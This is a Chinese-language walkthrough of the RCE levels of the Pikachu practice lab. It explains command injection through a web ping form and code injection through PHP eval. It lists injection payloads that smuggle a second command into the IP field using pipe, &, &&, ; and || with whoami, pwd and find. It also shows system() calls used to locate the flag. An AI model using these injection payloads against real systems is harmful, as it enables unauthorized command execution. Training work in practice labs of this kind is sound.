皮卡丘RCE靶场通关攻略

皮卡丘RCE靶场通关攻略

文章目录

RCE(remote command/code execute)概述

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

远程系统命令执行

一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口

比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上

一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交"意想不到"的命令,从而让后台进行执行,从而控制整个后台服务器

启动环境

启动靶场获得映射端口

这边地址是10.9.47.6:36162对它进行访问

漏洞练习

第一关exec "ping"

先输入地址尝试ping一下

ping完之后发现没反应

那就用我们命令注入测试语句试一下127.0.0.1|pwd

可以发现能看到目录说明存在该漏洞

接下来利用漏洞找到flag|find / |grep flag

接下来上传flag就通关了

下面是一些ping常用的注入命令

bash 复制代码
ping 127.0.0.1
127.0.0.1|whoami 
ping 127.0.0.1|whoami
127.0.0.1&whoami
127.0.0.1&&whoami 
127.0.0.1;whoami
127.0.0.1||whoami
127.0.0.0.1||whoami
127.0.0.0.1|whoami

第二关 exec "eval"

进入第二关这个是一个PHP代码的RCE利用

我们输入system函数看看能不能执行系统命令system('pwd');

发现执行成功了说明存在该漏洞,我们用漏洞找到flagsystem('find / | grep flag');

flag就找到了

相关推荐
jxy pro max26 分钟前
Corrosion2靶机练习笔记
服务器·网络·笔记
Antonio91537 分钟前
【网络编程】WebSocket 实现简易Web多人聊天室
前端·网络·c++·websocket
Σdoughty2 小时前
ospf笔记
网络·笔记
小白不想白a2 小时前
【MySQL安全】什么是SQL注入,怎么避免这种攻击:前端防护、后端orm框架、数据库白名单
数据库·sql·mysql·安全
学习溢出3 小时前
【网络安全】日志文件格式
安全·网络安全·系统安全·日志分析·系统日志
开开心心就好3 小时前
专业鼠标点击器,自定义间隔次数
javascript·安全·计算机外设·excel·音视频·模拟退火算法
火车叨位去19494 小时前
IM即时通讯系统面试准备(一)——websocket
网络·websocket·网络协议
大虾别跑5 小时前
tomcat隐藏400报错信息
java·安全·tomcat
GKDf1sh6 小时前
【前端安全】聊聊 HTML 闭合优先级和浏览器解析顺序
前端·安全·html
xyphf_和派孔明6 小时前
Web前端文件上传安全与敏感数据安全处理
安全